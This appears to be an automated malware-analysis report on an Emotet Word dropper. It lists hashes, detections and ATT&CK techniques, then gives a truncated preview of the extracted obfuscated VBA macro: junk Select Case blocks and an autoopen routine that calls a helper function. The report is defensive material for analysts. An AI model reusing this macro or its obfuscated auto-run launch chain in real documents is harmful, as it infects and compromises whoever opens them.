Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0aba359f77ac5765…

MALICIOUS

Office (OLE)

Size: 154.9 KB
Created: 2019-05-02 16:38:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 1d063cf8e4b83cacab1e6054373ff57f
SHA-1: b178ae07ad5b2e86a2d28c7543e136a984a60980
SHA-256: 0aba359f77ac576510a26b160b60e4b0bc470db5ec0341e64234681ec8c607c1
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample is identified as malicious by ClamAV with a specific Emotet signature. High-severity heuristics indicate the presence of VBA macros, including an AutoOpen macro and a WMI Win32_Process creation call, a combination commonly used to download and execute further stages. The VBA source is heavily obfuscated (the real calls are buried among junk Select Case blocks, as the extracted macros.bas below shows), but the heuristics strongly suggest its purpose is to launch a malicious process.

Heuristics (7)

  • ClamAV: Doc.Dropper.Emotet-6960272-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6960272-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML schema namespace, not a host the macro contacts.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31128 bytes
SHA-256: d61688ae7d9f68cd290202d39cd75a445d98483555b4034f4a9b1162983ff968

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "P304821"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "B854667"
Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z03201"

Attribute VB_Name = "C37266_"

Attribute VB_Name = "c955609"
Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "l4722754"
Function F497_66(z64_72)
   Select Case n5554069
Case i465376 = b66820 = Sgn(471333696)
Case s7261945 = p89161
Case a504467_ = Log(n36069)
Case J239105 = CBool(451270235)
Case n6_881 = 957082140
Case i3801617 = CDate(v3_2193)
End Select
   Select Case Y3_0594
Case Y6613_ = E47130 = Sgn(182332894)
Case c71647 = R47376_
Case n46623 = Log(S7943494)
Case n472_7 = CBool(455423588)
Case O9698_32 = 838331306
Case X536__2 = CDate(w9_432)
End Select
   Select Case Q6495_83
Case U32_903 = z8674829 = Sgn(468039462)
Case i2662841 = p443443
Case s91043 = Log(w1433080)
Case j9172563 = CBool(377410670)
Case C5_836_ = 496974668
Case K495__ = CDate(X742764)
End Select
Set F497_66 = CVar(z64_72)
   Select Case b52_114
Case d62_87 = k___192 = Sgn(709969944)
Case D_9917 = m52179
Case k0302_1 = Log(s5867_3)
Case P95956 = CBool(855892121)
Case C5742481 = 236360998
Case z2_23326 = CDate(V07769)
End Select
   Select Case V216_3
Case p1113571 = z_8__7 = Sgn(122239280)
Case C9947_1 = q754866
Case Z965280 = Log(W63641)
Case J185126 = CBool(897905841)
Case n74256_7 = 117942140
Case f159_85 = CDate(M48245)
End Select
   Select Case U7_449
Case b925_199 = a575393_ = Sgn(483630630)
Case U72964 = o71205
Case H8129321 = Log(z43254_7)
Case w86876 = CBool(291986409)
Case L810_13 = 458547345
Case G61904_ = CDate(L933330)
End Select
End Function
Sub autoopen()
   Select Case h_09641
Case p7_418 = R5123_ = Sgn(377277628)
Case s46998 = K92527
Case S766_3 = Log(R42056_6)
Case Z8251__ = CBool(30290621)
Case S8395005 = 889515263
Case f29566 = CDate(l0719212)
End Select
   Select Case C1040_9
Case s26389 = A6_9_271 = Sgn(964608343)
Case S6_21414 = m6352781
Case P25767 = Log(u43_39)
Case t_508681 = CBool(267674597)
Case T9601268 = 242473150
Case j66_5_7 = CDate(V36987)
End Select
   Select Case u_368338
Case h298942 = o133250 = Sgn(56115851)
Case I_501102 = A688875
Case Y846787 = Log(D2925008)
Case j8_345 = CBool(626239198)
Case b661584 = 108196528
Case n355119 = CDate(D90_4208)
End Select
Call X01_884
   Select Case i747408_
Case O4470_71 = z36309_ = Sgn(778089229)
Case z_142047 = q00083_
Case o05739 = Log(F97___)
Case S3_517_9 = CBool(596131204)
Case R77705 = 712650870
Case d4078830 = CDate(s0424__)
End Select
   Select Case L385843
Case P231831 = i05537 = Sgn(839811757)
Case n_62440 = b023649
Case j8206679 = Log(p_179_)
Case B3002277 = CBool(49099996)
Case W177933 = 187188136
Case z669098 = CDate(O31496)
End Select
End Sub

Attribute VB_Name = "r71782"
Function X01_884()
On Error Resume Next
   Select Case C36046
Case L925428 = r32461 = Sgn(73907688)
Case z3453775 = I_01619
Case K171433 = Log(p73684)
Case N97700_ = CBool(264746464)
Case z28386 = 653461758
Case V312_147 = CDate(j46619)
End Select
   Select Case R9529912
Case B_8503 = q9378825 = Sgn(210491738)
Case Q359_577 = u8_73094
Case T_6727 = Log(l_4753)
Case f29_3760 = CBool(911317383)
Case w50413 = 639562234
Case k084860 = CDate(Q480438)

... (truncated)